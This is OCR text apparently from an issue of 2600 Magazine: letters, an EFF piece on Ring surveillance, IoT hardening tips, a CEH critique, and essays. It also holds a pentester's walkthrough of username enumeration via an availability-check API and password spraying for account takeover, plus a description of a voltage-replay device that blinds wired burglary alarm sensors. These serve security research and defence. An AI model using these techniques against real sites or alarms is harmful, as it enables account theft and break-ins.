information after 30 days (“Sorting It all Out: The 
Long Lost Bastard Children of the United States 
Postal Service”). Do you believe everything the 
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gum-mint tells you? I don't! Never ever believe the 
government! 

What actually happens is that before the USPS 
erases the information, some other TLA (three letter 
agency) hacks the USPS files and takes that informa- 
tion and stores it forever. It might be the CIA, NSA, 
772, or all of the above, but it is stored for later use. 
They can tell you received eight letters from zip code 
40202, but not the specific person just by decoding 
ZIP code information. If nothing is written as a re- 
turn address or identifying information, then they are 
stuck. 

I am subscribed to Informed Delivery and it is 
very convenient to know what will be arriving in to- 
day’s mail. I only receive package information maybe 
20 percent of the time depending on how metered 
postage is paid. I am also a very experienced phila- 
telic collector and was a good friend of former Post- 
master General Marvin Runyon. I first met him when 
he was the head of the Datsun plant, now Nissan, in 
Smyrna, Tennessee, and I covered him for the local 
newspaper. 

I have a friend that has big connections with Fe- 
dEx in Memphis (does business with them) and is a 
Motorola radio dealer who buys lots of radio surplus 
stuff from the federal government and others. It is not 
“current” surplus, but maybe one generation from 
current, so they surplus it for pennies on the dollar, 
sometimes for tenths of a penny on the dollar, and 
then sell it on eBay (aka eGreed). I am a ham radio 
guy with extra class privileges, the highest available. 
I also have lots of DES-XL, DVP-XL, and AES 256 
encryption methods available for my radio hobby. I 
have keyloaders for all of the algorithms and even a 
KVL4000 key loader, the latest Motorola acknowl- 
edges they make. No telling what they only make for 
the gum-mint. It is illegal to use encryption for ham 
radio unless you are communicating with a satellite. 

My wife has been told that if anyone comes by 
the condo and asks to come in, you ask them “Do you 
have a warrant or probable cause? If the answer is no, 
tell them to get their ass back out on the street as they 
are trespassing! | didn’t work for over 40 years with 
the local news media for nothing. 

Oh, and I also have cans of CIA X-ray spray that, 
if you spray an envelope, you can usually read what 
is inside. Wonder if they use it on letters addressed 
to 2600? I bet they sometimes do! I sometimes wrap 
heavy construction paper around information ad- 
dressed to others I don’t want read! 


ABE 

(not my real name) 

If you reread the article in question, you'll see that 

the author expresses the same skepticism you do as to 

whether or not those images are truly destroyed. And 

while we'd love to believe the scenario you describe 

as to what really happens to this data, you didn't 

provide any actual proof, other than suspicion and 

mistrust of the government, which is more than likely 
justified. But actual evidence is really good to have. 
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There seems to be some debate in the ham radio 
community as to whether or not encryption is illegal 
for general communications. We'd love to get more 
input on this. 

And we bet your wife didn’t need to be “told” 
by you how to handle warrantless entry - she likely 
already knew that plus a whole lot more. 

Thanks for explaining why this letter was mailed 
to us attached to a sheet of black construction paper. 
We thought it was just for the look (which was pretty 
cool). And,.for some reason, all of our normal sup- 
pliers of x-ray spray have dried up. 

Dear 2600: 

I am in an institution and, as I await the resolu- 
tion of an appeal to conclude that my last issue of 
2600 isn’t “contraband,” I was just reading a recent 
Consumer Reports (January 2019, page 7 “Reopen- 
ing the Internet”). I am pleased to report that Con- 
sumer Reports has been assisting in some efforts 
regarding the net neutrality laws now being passed 
by some states, even though the feds don’t believe 
the states can be responsible to handle their own 
guidelines. 

Let me quote a bit for you: “California has been 
the latest state to restore net neutrality protection... 
The law, considered to be the most comprehensive 
in the nation will defend consumer choice and com- 
petition by preventing ISPs from blocking, slowing 
or giving preferential treatment to any websites or 
apps.” 

Although California is only one of three (Wash- 
ington and Oregon included), they (Consumer 
Reports) believe that because of California’s size 
(and tech-savvy valley girls), it may more heavily 
influence the overall outcome of this fight. Califor- 
nia’s Consumer Reports members sent over 20,000 
emails to state reps supporting the bill. In the end, 
the feds determined that the states lack authority to 
enact their own such guidelines. 

The fact that Big Brother continues to cogitate 
they have the best interests of the public in mind, I 
can only imagine the level of lobbying that ISPs are 
investing in. But please, read on.... 

There is a federal bill backed by Consumer Re- 
ports and Senator Ed Markey (D-Massachusetts) 
that would reverse the FCC’s repeal. It passed the 
Senate in May, but got stalled in the House. 

To assist in this fight, go to action.consumerre- 
ports.org/tech20180611comments. 

I would like to see some details or an article 
about the biggest ISP companies involved in this 
cock-blocking effort, including the lobbyist firm(s) 
assisting them. (Maybe that’s a bit harsh.) 

As stated earlier, at present I do not have the 
resources many of you have, but I have a dummy 
workstation and am educated enough to write a 
pointed letter or two. If anyone has facts on this 
topic and how more of us can be directly involved, 
I’m sure I am not alone in wanting to know more. 
For those of you who don’t write, you can tell your 
people to boycott these power hungry bullies by not 
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by Jason Kelley 


Before it became a corporate-sponsored police 
mass-surveillance tool that’s contributing to irra- 
tional panic in neighborhoods across the country, 
Ring began in 2013 as a “smart” doorbell. The 
company’s camera-enabled product allowed you to 
remotely see who was at your front step, right from 
your phone. But with its rapidly growing partner- 
ships with law enforcement, and its “crime preven- 
tion” social networking app, Ring has quickly 
mutated into a tool for police to spy on neighbor- 
hoods, and neighbors to spy on one another. 

Ring doorbells record video of visitors, deliveries, 
residents walking nearby, and anything else that trig- 
gers the motion sensor, plus the vicinity across from 
the user’s device, often including other neighbors 
and their homes. This video is transmitted straight 
to users’ phones. After Amazon’s purchase of the 
company in 2018, that video also goes to the cloud, 
where it’s available for members subscribed to Ring’s 
“Protect” plan for up to 60 days. Users can quickly 
share the footage to the “Neighbors” app, the compa- 
ny’s community-watch focused local social network. 

Intrepid reporting has revealed that the footage 
is also often available to local law enforcement - and 
that police are working in tandem with the company 
to promote their products. Together, Ring and law 
enforcement are creating a vast network of cameras 
linked together whose recordings are centralized and 
available to police directly from the company. 

There are significant privacy concerns with this - 
and they are multiplying quickly. First, the majority 
of alerts from motion-sensitive smart doorbells are 
simply not indicative of crimes, though constant 
push-notifications will create the illusion of a house 
that’s under constant threat. Add in the ability to 
share “crime and safety notifications” with neighbors 
at the touch of a button, and you've created a vicious 
cycle that convinces users and non-users alike that 
they must protect themselves from “suspicious 
activity” - despite the fact that crime in the United 
States has been steadily decreasing for decades. The 
cameras have inflamed tensions in communities 
across the country, as residents post videos of people 
who they don’t recognize or who they believe are 
up to no good, with no evidence of actual criminal 
activity. Ring and its partner app, Neighbors, super- 
charge a community’s ability to spy on itself. 

Second, law enforcement is partnering directly 
with Ring in a symbiotic relationship that’s benefi- 
cial to both Amazon’s bottom line and the law 
enforcement panopticon. As of this writing, over 400 
police jurisdictions were working directly with the 
company, which gives talking points, special incen- 
tives, and promotional materials to agencies who 
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EFFecting Digital Freedom 


Amazon Ring Is Turning Our Front Doors Into Vast, 
Unaccountable Surveillance Networks 


then do Ring’s marketing for them. Ring even looks 
at law enforcement press releases and messaging 
in advance, crossing out words like “surveillance” 
because it might “confuse residents.” Sometimes, 
as in the case of Ewing, New Jersey, the city itself 
pays Ring directly, which then gives discounts on the 
devices to Ewing residents. 

What do police get out of it? A massive network 
of 24/7 surveillance footage that’s available without 
the usual paperwork - or the scrutiny of residents 
who would undoubtedly balk if required to add 
police-accessible cameras to their front doors. Once 
the devices are installed, Ring makes it easy for 
police to request videos - what the company calls 
the ability to “solve more cases with one click.” 
Law enforcement can log on to a specialized web 
portal and request video from a specific time and 
geographic area. Then Ring automatically sends all 
the users in that area an email asking them to “take 
direct action to make [their] neighborhood safer” 
by sharing their videos with the police. Users can 
decline. But in an environment where neighbors, 
local government, law enforcement - and a company 
you pay to protect your home - are all teaming up to 
demand your video footage, the pressure to comply 
is enormous. And even if you say no, the company 
will still present the recorded videos to police if 
required by a warrant. 

Yet another privacy concern lies over the 
horizon, Ring isn’t Amazon's only disturbing 
surveillance system. Amazon also sells police a face 
surveillance system called Rekognition. It might not 
be difficult for Amazon to merge these two systems, 
allowing police to apply Rekognition face surveil- 
lance to everyone who happens to walk down the 
street past a Ring camera. Amazon has even filed 
patents indicating their interest in creating a real- 
time alert system that recognizes suspicious indi- 
viduals. It’s easy to imagine the draw this sort of 
surveillance tech might have for law enforcement, 
despite growing public objections to government use 
of face recognition. 

Do our communities really need Ring, and its 
expanding assault on our civil liberties? Or have 
Amazon and the police stoked fear and anxiety 
about criminal activity to convince people to pay for 
a massive new surveillance system? It’s time for city 
councils and community residents to decide whether 
to shut down police access to these vast video 
surveillance networks. Even better, it’s time for 
cities to adopt laws forbidding police from unilater- 
ally acquiring access to such surveillance tech, and 
instead empowering community residents and city 
councils to decide. The safety of our communities 
matters, but it should not come at the expense of our 
privacy. 
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fictive 


by Anonymous 


I was a hired gun for many large corpo- 
rations, finding dirt on targets, doxing their 
family homes, and providing a written report 
as if it was an ethical, professional service 
rendered. Oh, you too? Yes, this is a profes- 
sion, yes, you can get paid to dox people on 
the Internet, and I would bet that someone you 
know does the same thing. And we suck. 

I’ve also been targeted by corporations who 
didn’t like some reverse engineering I was 
doing. Their goons tried to track me down to 
send me a legal threat and I at least confused 
them for six months before they had to resort 
to using my hosting company to find me. 

Almost every single large organization has 
an industrial espionage team that might fly 
under a different name like “competitive intel- 
division.” No 


ligence” or “business analys 
one thinks Brenda from Business Analysi 
threat, but we should be afraid of her. 
Their job is to find threats to their organi- 
zation, be it a competing company that could 
affect their stock price or a kid in an IRC 
channel trying to build support for a protest 
which is just bad PR. And those teams have 
teams of third-party vendors that do some of 
the dirty work for them. Not always because 
they can’t do it themselves, but because they 
want the deniability if something goes wrong. 
I was one of these vendors and I want to 
share things that might help you if you’re ever 
targeted by a goon like me. 
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Know Your Enemy 

One of the things that motivates me is being 
told I’m not allowed to do something and then 
proving them wrong. So when you block my 
access to your Facebook page or delete your 
Twitter account, I just work harder to find dirt 
on you. I bet, in some ways, you're like this 
too. So are people working in corporate intel. 
We can use this information to coordinate a 
better defense. 

We are focusing on one threat here: that of 
the salaried, 401k contributing, 9-5 corporate 
intelligence goon. They are not nation state 
adversaries, they are not local law enforce- 
ment. They have specific operating constraints 
that can be exploited for defensive purposes. 
Here’s what you should know: 

1. They are resource constrained. 

Unless you've done something particularly 
nefarious, you’re not worth all their time. Or 
for the third parties working for corporations, 
you can’t spend a month on a person and not 
have actionable intel. You have to determine 
whether it’s worth it at the beginning of the 
project. Let’s see if we can’t waste some of 
their important time. 

2. They need to produce a result. 

In enterprise environments, you don’t get 
paid to start projects that don’t go anywhere. 
If they are targeting you, they are going to 
produce a result. It’s a simple boolean conclu- 
sion: threat, no threat. And they must provide 
supporting evidence to justify this conclusion. 

“She is a threat because she’s building 
support for a protest in front of the building.” 

“He is not a threat because he’s 13, lives 
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CITIZEN ENGINEER - 


by Limor “Ladyada” Fried (ladyada@alum.mit.edu) and Phillip Torrone (fill@2600.com) 
“Preventing loT Device Attacks" 


Attack surface reduction” is a security principle that you can use to guide your choices when 
designing an IoT product or service. The attack surface of a hardware or software environment 
is all of the different points where an unauthorized user can try to insert or extract data. Keeping 
the attack surface as small as possible is an essential but necessary security measure. Since 
devices like the ESP8266 and others have come along, anyone can be an IoT device developer 
for about $5. 

With IoT, there are at least two attack surfaces. The thing itself, say an Internet-connected 
temperature sensor, and the service - whether Google Cloud, Microsoft Azure, or Amazon 
AWS, etc. Since web service security has been discussed a ton in 2600 Magazine and other 
publications, let’s go over device security, from the easiest first. 

These “ten things” are not everything you'll have to worry about, but it’s a good start, and 
if you do these, you’re ahead of 99 percent of IoT vendors. 

#1 Require login and password. This is number one because it’s the bare minimum. Don’t 
have an open, network-accessible interface to your loT device. You may think “oh nobody is 
going to guess the URL or the port number” but that’s the first thing attacks probe. Even if it’s 
on an intranet, require some authentication! 

#2 Don't have default logins and passwords. We mentioned this before, but it bears repeating 
because it’s so common! Make sure your device has a unique, unguessable password by default. 

#3 Two-factor authentication. In addition to a username and password, maybe have an SMS 
or time-based second factor. 2FA will protect you even if the password is sniffed or stolen, 2FA 
is free and pretty easy to implement these days - you no longer have to distribute a physical 
token, since most everyone has a mobile phone. 

#4 Require TLS/SSL. Whenever your users or devices connect to the Internet, whether over 
Wi-Fi or cellular, use the latest available version of TLS, sometimes called SSL or HTTPS. 
TLS will encrypt all data transmitting between the device and the service, protecting both. TLS 
will significantly reduce your risk of sniffing. A few years ago, microcontrollers were older 
and smaller and couldn’t effectively run a TLS stack. Nowadays, there’s no excuse to skip it. 

#4.5 Authenticate Host Certificates. TLS is not just data encryption; it’s also server authenti- 
cation. So, if you’re using TLS, make sure your device is checking the fingerprint or certificate 
chain of the server. We’ve seen some TLS implementations where it’s possible to skip this, 
which makes man-in-the-middle attacks possible. 

#5 Turn off any unused services. If you have an embedded Linux or RTOS for your device, 
make sure no services are running. File sharing, remote login, mail servers, etc. These days, 
most services are not enabled by default, but check anyway. Sometimes these are left on during 
development and are forgotten when the firmware is released. 

#5.5 Don't accept any inbound connections. If you can, don’t allow any way for outside 
parties to connect into the device. If you have a debugging port left open, that’s just another 
attackable surface. 

#6 Require physical access for important configurations. We've seen some Wi-Fi cameras 
that can be controlled over the Internet, but if you want to change the access point password, 
you need to plug it into a computer and change the setting over USB. This reduces the surface 
that can be attacked by automated scripts. 

#7 Individualized/Revocable Authentication Keys. For your device to connect to the service, 
chances are it has some authentication key or password. Make sure that you have a unique key 
or password for each device - even if the user never sees these, you shouldn’t reuse them. You'll 
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also need to have a way to revoke/re-instantiate keys if they’re lost, corrupted, or stolen. 

#8 Data Paranoia, Even though you may only be shuffling data from your IoT device to 
your IoT service, don’t trust that the data is well-formatted. This is often forgotten in a rush to 
complete and ship firmware, but you should assume that attackers will try to send corrupted or 
malformed chunks of data to both sides of the connection to corrupt memory. Clean up and vet 
data thoroughly; this will also keep your device running smoothly if the network connection 


is flaky. 

#8.5 Updatable Firmware. Bootloaders are the best, and it’s a good idea to have one on your 
device. Many are write-only so that the deployed firmware can’t be read. Being able to update 
firmware will help customers recover the device if it gets bricked, hacked, or if there’s a critical 
security update. We like USB bootloaders the best, or ones where you insert an SD card with 
a file. Having updatable firmware increases your attack surface a bit because it opens another 
access point into your device, but we think that if someone has physical access, they could 
connect a JTAG programmer to erase and reprogram it anyways. 

#9 Secure storage for authentication keys. Embedded Linux devices have a regular file- 
system, and microcontrollers often store their code in flash memory, so even if your hard-code 
authentication keys in flash or EEPROM, it can be read out. Yes, even if you have a chip that 
has firmware-readback turned off, it’s possible to glitch chips into revealing their secrets. Your 
microcontroller memory should not be considered secure storage! Instead, you may want to 
consider using a secure element chip. These chips are designed to withstand common decap- 
ping and glitching attacks and can be programmed with the private key at your factory. Then, it 
never leaves the secure chip. Instead of having the key sit in microcontroller memory where it 
could be read out, data that needs to be authenticated or encrypted is sent back and forth through 
12C. It’s a little extra cost, but it is an excellent way to keep the secrets in a lock-box. 

#10 Over the air updates. This one is a little tricky. Not having OTA is risky because then 
there’s no way to send important security updates. On the other hand, having OTA is dangerous 
because it allows an attacker to take over the device completely. We think OTA is a good idea, 
but you need to combine it with the prior rules - firmware must be transmitted over an authenti- 
cated, encrypted connection. Having firmware be signed with public-key cryptography (so the 
private key is not stored on the device) is a common idea, but be aware that private keys can 
leak out. so that should not be the only way you verify the firmware is valid. 

We’ ve seen more than one company accidentally “brick” their devices with a mistaken OTA 
- some even required a physical recall - so if you do have OTA updates, make sure you always 
have a way for physical-access-rollback. 

For both your IoT device and service - if it has a web interface, it should be protected against 
standard — hacking 
techniques like 
remote code execu- 
tion, path traversal, 
cross-site request 
forgery, and SQL 
injection. There are 
scanning — services 
you can run against 
the website as well 
as on the code itself 
to find egregious 
errors. 

Good night and 
good luck. 
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by aestetix 


Certifications (certs) have been around for 
a long time. There are real benefits to them: 
whereas a traditional college degree in a field 
like computer science gives us four (or five) 
years of intensive education which we slowly 
forget and which can become outdated, certi- 
fications encourage us to keep up to date on 
technology and provide employers with a 
more accurate way to gauge aptitude. 

There is a downside, though, especially 
when people obtain a cert and then assume they 
know technology better than people without a 
cert. The comic Dilbert captured this well in 
an old strip from October of 2000 in which a 
certification “superhero” proudly summons the 
“vast powers of certification,” and then real- 
izes he can’t remember anything else from the 
classes. 

A more dangerous issue with certifications 
has arisen in recent years, beginning with the 
CISSP, and now moving to full force with 
the Certified Ethical Hacker (CEH) certifica- 
tion. People who have achieved their CISSP 
will frequently tell us that they have had to 
“reform” their hacker ways, or that they had 
to stop using a handle as part of the guide- 
lines of the cert. But the CEH takes this a 
step further, establishing a rather long Code 
of Ethics (www.eccouncil.org/code- 
of-ethics/) which every individual who 
earns a CEH is required to swear an oath to 
‘uphold. For anyone who adheres to the original 
“Hacker Ethic” as described by Steven Levy in 
his book Hackers, several demands from the 
CEH Code of Ethics are very problematic. 

To start with: item 16 of the Code states 
that one must vow “Not to take part in any 
black hat activity or be associated with any 
black hat community that serves to endanger 
networks.” If we define “black hat activity” 
as illegal activity - although CEH does not - 
the first part of this seems reasonable enough. 
The second part raises some questions though. 
What is a “black hat community?” What if 
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we are in a community where some of the 
members download illegal copies of episodes 
of Game of Thrones? Is this enough to warrant 
a violation? And beyond that, what if we are 
in a group where some people do “black hat” 
things, but we ourselves do not? Is it really fair 
to punish someone for the crimes of someone 
else, simply due to association? 

It gets even worse with item 17, which 
demands us “Not to be part of any under- 
ground hacking community for purposes of 
preaching and expanding black hat activities.” 
What do “preaching and expanding” mean? 
What if we’re in an IRC channel where some 
people do illegal things, and we have discus- 
sions with them? Are we required to cut off ties 
with people? And who decides what consti- 
tutes “black hat?” What if we encourage civil 
disobedience, pushing to purposefully break a 
bad law in order to enact a greater good? Is this 
grounds for a Code violation? I now wonder 
if the hackers who devised Stuxnet, the worm 
that infected Iran’s nuclear centrifuges, would 
be in violation of the Code, even though they 
were carrying out orders from the President. 

The last item we need to visit is a bit more 
controversial, but nonetheless important. Item 
19 states that we should not be “convicted 
in any felony” nor should we have “violated 
any law of the land.” This rule is simply too 
sweeping. What if we are a convicted felon for 
something unrelated to computers? And more 
important, what if we are a convicted felon, 
but have served our time, and want to reinte- 
grate into society? If someone has done some- 
thing wrong in the past and wants to redeem 
themselves, isn’t agreeing to follow a set of 
ethics precisely what they should do? Why 
create a requirement that eliminates the very 
people who might want to use this certification 
to achieve that goal? 

That’s just the Code itself. And, while I 
think it is poorly thought out, the enforce- 
ment of it is even worse. The EC-Council, who 
provides this cert, has a procedure to report 
“violations” of the Code, found at cert. 
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meccouncil.org/report- 
violation.html. The form amounts 
to filling out a police report, using the Code, 
and including the items we just reviewed as 
a pseudo-legal system. Anyone can fill out 
this form and report someone. It is in a sense 
creating secret police, because anyone who 
doesn’t like us can figure out an interpreta- 
tion of Code that will make us look bad. The 
result is that we could lose our certification. 
Of course, the EC-Council will likely assure 
us that these things would never happen and 
we're reading too much into their words. But 
then I must ask: what is the point of having a 
Code to which they force people to swear an 
oath if they do not plan to enforce it? 

And it’s not just that. More and more secu- 
rity and technology jobs these days have “CEH 
certification” as a job requirement, partly 
because it’s a nice sounding term that HR can 
use to filter out resumes. So what happens 


when someone sees us download Game of 


Thrones, decides that this violates item 16, and 
reports us? If the EC-Council Tribunal takes 
up our case and decides against us, not only 
could we lose our certification, we could also 


lose our job and livelihood. And because this 
is becoming a standard with many companies, 
this amounts to being blacklisted from getting 
another tech job, unless EC-Council Tribunal, 
in their good graces, grants us some form of 
clemency. 

Adding insult to injury, the use of the word 
“ethic” within the CEH Code is completely 
removed from any traditional definition. When 
we study ethics in school, we might have a 
class on Aristotle, or explore exercises like 
the Trolley Problem and learn that sometimes 
there is no good way out of a situation. With 
the CEH Code, all of the items reinforce a 
notion that mindless obedience to corporations 
and governments is good, which betrays both 
the Hacker Ethic as well as a true exploration 
of the word “ethic.” In truth, the CEH certifica- 
tion is a scheme that is used to trap people who 
are interested in working in tech into a situa- 
tion that binds and controls not only what they 
do outside of work, but even the people with 
whom they associate. 

To paraphrase Orwell, Big Brother is Certi- 
fying You. 


THOUGHTS ON 
ACCOUNT ENUMER ATION 


by Sam@sayen.io 


As a pentester who makes his living doing 
various proactive services, I have had the 
opportunity to do authenticated and unau- 
thenticated pentests on dozens and dozens of 
professionally developed web applications. 
Many of the OWASP “top ten” findings are 
talked about extensively and, on a technical 
level, they are more interesting than account 
enumeration. Subtle details with authentica- 
tion make what is typically considered a low 
level finding quite exploitable and serious. 
Let me explain this very common configu- 
ration which in a high percentage of sites is 
exploitable. 

For a moment, let’s disregard any automa- 
tion safeguards such as Captcha or lockout via 
IP addresses. Although some top tier applica- 
tions have these features, your thousands of 
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mid-level ecommerce and company web appli- 
cations typically do not (in my experience). To 
authenticate a non MultiFactor Authentication 
enabled account, a user must know two things: 
an email address/username and a password. 
Guess which one is harder to figure out in bulk 
if there are no enumeration vulnerabilities? 
Password? Guess again. The email addresses 
for all but the largest applications (Amazon, 
eBay, sites with millions of users) are going to 
be harder to guess in bulk. The reason is that 
for a mid-size application, I can likely guess a 
common person such as Joe Smith will have 
an account. What I cannot easily guess is that 
user’s email address. Popular freemail services 
like gmail are so saturated that unless Joe 
was an early adopter, he does not own “joe. 
smith@ gmail.com”, “jsmith@gmail.com”, or 
even “josephsmith@ gmail.com”. His address 
is more likely to be “jsmith0O217@gmail.com” 
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or “joseph.r.smith@some_local_randomass_ 
ISP_provider.com”. To put it another way, I 
would rather take the bet that one of the knuck- 
lehead users of an application has the pass- 
word “Trump2020” than bet that a user of the 
application has the email address “joe.smith@ 
gmail.com”. Seems counterintuitive, right? 
This is compounded by the fact that almost all 
public websites have weak password policies 
of eight characters and one special character 
or number. The overall point I am trying to 
get at is that if bulk compromises are the goal 
(not compromising one specific account), a 
valid email address is at least as valuable to an 
attacker as a known password. 

Although damn near every website is 
vulnerable to email address enumeration, 
most are vulnerable to it via the password 
reset function, which gives a unique message 
stating that the recovery email has been sent, 
or that the account has been sent a recovery 
email. To an attacker, these are not particu- 
larly useful because the user has been alerted 
with an email, and now the account is (likely) 
locked until the unique link gets clicked and 
the password is reset. There is plenty of room 
for “issues” in that process, but that is not the 
focus of this discussion. What I consider to be 
a very exploitable and common (mis)configu- 
ration that leaves many sites vulnerable to 
account takeovers is at a glance a non-finding 
for many pentesters. If a site allows you to 
authenticate using an email address or a user- 
name, it is game on. Why? Because most sites 
that use usernames allow you to create them. If 
you can create a username, you can enumerate 
usernames. There isn’t a feasible way that an 
application can keep people from registering 
an already taken username without telling the 
user that the account is available or taken. 
AKA enumeration. Usually it is a simple GET 
request to an API that looks something along 


the lines of: 
GET /API/user/<USERNAME>/check 


Many applications return a simple true 
or false value in a JSON blob indicating if 
the username is available. Others may return 
an encoded response that is numeric, but 
those are still vulnerable to enumeration. 
The problem with this is that now an attacker 
can create a word list of common names and 
common last names with all the letters of the 
alphabet in front of them to throw at the API. 
This is usually the most common enumera- 
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tion vulnerability for web applications. In the 
worst enumeration cases (which are amazingly 
common), user accounts are assigned an incre- 
mented numerical number that coincides with 
the username. At that point an attacker can 
essentially dump the application’s user data- 
base by walking the API call using consecutive 
numbers with a proxy automation tool such as 
Burp Intruder. 

Other areas that are prime for user account 
enumeration include messaging functionality 
that auto-completes your typing. If you start to 
type “Bob” and the application starts to auto- 
complete for you, then you can usually just 
turn on intercept with your proxy tool to catch 
the AJAX/XHR request so you can replay 
the GET request to alphabetically enumerate 
usernames (typically returned in JSON blobs). 
Parse or grep through the JSON for the win. 

At the heart of exploitation for username 
enumeration is the method of password 
spraying. Password spraying is the exact 
inverse of brute forcing. Instead of submitting 
many passwords for one account, we submit 
many accounts with the same password. This 
is a useful attack for two reasons. If you want 
authenticated access to an environment, the 
details of which account grants access are not 
important. The other reason is that by submit- 
ting one password to hundreds of accounts, 
you will not lock out any users, or likely alert 
them about the failed authentication attempt. 

Critical mass for successfully password 
spraying enumerated accounts varies. From 
my experience, [ am usually performing an 
account takeover after only one password 
spray if I have around 300-400 usernames 
enumerated. 

What is an effective way to thwart this 
incredibly easy account takeover method? Do 
not allow usernames for authentication. Sure, 
you can have them assigned to accounts and 
used once you are in the application, but make 
the users authenticate with an email address. If 
you configure an application in this manner, the 
hard-to-fix username enumeration vulnerabili- 
ties still exist, but they don’t give the attacker 
50 percent of the authentication request. The 
most likely place to get a solid email address 
list to spray is by mining previous breaches 
and hitting the application with a long list, 
which can be slow. In the end, time is money 
for an attacker... and for a pentester. 
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Burglary Zone Input Tester 
An Experimental Design for Testing 
Hardwired Connected Sensors 


by Cezary Jaronczyk 


Commercial burglary alarm systems protect 
many important facilities that are important for 
the safe operation of energy, water, transport 
systems, and so on. Among the safest security 
systems are those where the sensors are wired 
to the input circuits of the alarm systems or 


the zone loop inputs. However, if we perform. 


a successful attack blocking the sensor using 
the device described here, it may turn out that 
the certified burglary alarm systems previ- 
ously considered to be fulfilling their security 
functions should not be considered as such 
anymore and for the safety of the protected 
facility should be supplemented with security 
solutions against the presented attack. 


Compromising 
Hardwired Connections 

As the hardware zone loop is powered 
by a constant voltage level delivered by the 
burglary control unit or a zone expander, it is 
very easy to build and to apply devices that 
can read and remember the voltage level in the 
zone loop and later, on a request, feed it back 
to the zone loop. 


When, for example, the applied compro- 
mising voltage level represents the status of 
“closed door” (window or other barriers), 
then opening the door (window or other 
barriers) will not affect the zone loop voltage 
level because a burglary control unit sees the 
zone loop status as not changed. In this way, 
someone can access a protected area without 
being noticed. 

In the case where more than two wires 
count in a zone loop, more compromising 
devices may be used to connect to the wires in 
a circular pattern, in order to monitor and then 
substitute all voltages presented in the zone’s 
loop circuits. 

Figure 1 presents a full schematic of a 
device that can be used to compromise a 
burglary alarm system with a wired zone loop 
powered by a constant voltage level. If the zone 
input is compromised successfully, opening 
the door or window with a contact switch as 
a sensor makes the burglary alarm think that 
door or window is still closed. If this burglary 
alarm is certified, the certification probably 
did not meet all the burglary alarm standards’ 
requirements regarding input circuits. 
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“Information is Neutral” 
anid “Other focal, Myths 


J 


by Red_Liberty 


When we hackers say “information is 
neutral” and “information should be free,” a 
common response to this is, “What the hell 
are you talking about?” They then would, of 
course, cite the Four Horsemen of the Info- 
calypse (terrorists, drug dealers, pedophiles, 
and organized crime) and other examples of 
how information is not neutral. To which we 
would assert that the same violent response, 
according to reason, should inevitably follow 
when we say something along the lines of, “we 
hold these truths to be self-evident, that all 
men are created equal, that they are endowed 
by their creator with certain unalienable rights, 
that among these are life, liberty, and the 
pursuit of happiness.” 

Clearly some information is very harmful, 
and clearly humans are not at all created equal, 
nor do they have some abstract, intrinsic, 
inalienable rights. These are objective facts, 
nothing more, nothing less. 

When we say these things, we mean they 
ought to be as we say they “are” insofar as 
something even greater is concerned. 

Human rights may be social myths, nothing 
more than meaningless abstractions. But do 
not say this to that one particular social orga- 
nization that holds a monopoly on violence in 
human society, that is used as an instrument 
for the suppression of one class over another: 
the state. Because if you say that to the state, 
you might end up with something similar to 
the modern People’s Republic of China where 
there is no real negative liberty (freedom of 
the press, speech, protest, religion, etc.) at all. 
Similarly, some information causes real world 
harm and shouldn’t exist. But don’t tell that 
to the state or to your local Internet Service 
Provider. They just might censor your access 
to certain information, and their ability to see 
what you are doing at all poses a serious threat 
to the existence of individual liberty as such. 
You might end up with an incredibly filtered 


Page 60 


Internet where downloading a song that turns 
out to be pirated can land you serious jail time. 

This is what we mean when we say “infor- 
mation is neutral” and “information should be 
free.” This is what we mean when we say “all 
humans are created equal, and have certain 
inalienable rights.” We are not idiots here. 
Sometimes it is necessary to say things as they 
ought to be, not as they are. This is necessary 
precisely because the result of doing so is 
benevolent to society as a whole, and not doing 
so is to society’s detriment. 

Human rights do not exist, but they should 
be respected. No individual or institution 
should have the right to murder you because 
of something unfavorable you wrote about me. 

Information is not neutral, but it should be 
free. No individual or institution should have 
the right to censor and monitor you. 

The inevitable result here, of affirming 
things as they are, is for the worst possible 
scenario to be derived thereof. This is why 
social myths are necessary in human society. 
Do they cause harm? Certainly, and these 
harms should be mercilessly combated. 
“Human rights” are constantly an excuse 
imperialism uses to justify its own nefarious 
ends under the cloak of benevolence. But even 
with these truly terrible abuses, the net social 
harm caused is far less than the net social 
harm that would be caused without them. Just 
ask anyone working on the Tor Project why 
their work is necessary in spite of the known 
abuses of the Tor network. Without a formal 
recognition of human rights, every country 
in the world would likely have its own Stasi 
or Gestapo. This is why when you ask me, I 
say “Yes, information is neutral and should be 
free.” This is why when you ask me, I say “Yes 
human rights exist and should be respected.” 

We as hackers have a responsibility to 
promote a free and open Internet where infor- 
mation is free, and if that means using the 
same social myths that human rights advocates 
use, then I say it’s worth it. 

2600 Magazine 


HA@GKHER 


HAPPENINGS 


Listed here are some upcoming events of interest to hackers. Hacker conferences generally don’t cost 


a fortune and are open to everyone. If you know of a conference or event that should be known to 

the hacker community, email us at happenings@2600.com or by snail mail at Hacker Happenings, 

PO Box 99, Middle Island, NY 11953 USA. We only list events that have a firm date and location, 
aren’t ridiculously expensive, are open to everyone, and welcome the hacker community. 


October 18-20 

Maker Faire Rome 
Fiera di Roma 

Rome, Italy 
www.makerfairerome.eu 


October 24-25 
GrrCON 

DeVos Place 

Grand Rapids, Michigan 
grrcon.org 


November 8-9 
PhreakNIC 

Clarion Inn 
Murfreesboro, Tennessee 
phreaknic.info 


November 15-17 

Hack3rCon X 

Charleston Coliseum and Convention Center 
Charleston, West Virginia 
www.securewv.org 


December 27-30 

Chaos Communication Congress 
Congress Center Leipzig 

Liepzig, Germany 

www.ccc.de 


January 31 - February 2 
ShmooCon XVI 
Washington Hilton Hotel 
Washington DC 
www.shmoocon.org 


May 8-9 
THOTCON 0xB 
Chicago, Illinois 
thotcon.org 


May 15-17 

NolaCon 

Hyatt Centric 

New Orleans, Louisiana 
nolacon.com 


June 12-14 
CircleCityCon 7.0 
The Westin 
Indianapolis, Indiana 
circlecitycon.com 


August 6-9 

DEF CON 28 

Caesars Forum, Harrah’s, Ling, Flamingo 
Las Vegas, Nevada 

www.defcon.org 


Check www.hope.net 21-Oct-2019 


Please send us your feedback on any events you attend 
and let us know if they should/should not be listed here. 
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Marketplace 


For Sale 
HACKER WAREHOUSE is your one stop shop for hacking 
equipment. We understand the importance of tools and gear 
which is why we carry only the highest quality gear from the 
best brands in the industry. From WiFi Hacking to Hardware 
Hacking to Lock Picks, we carry equipment that all hackers 
need. Check us out at HackerWarehouse.com. 

CLUB-MATE is now easy to get in the United States! The 
caffeinated German beverage is a huge hit at any hacker 
gathering. Available in two quantities: $36.99 per 12 pack or 
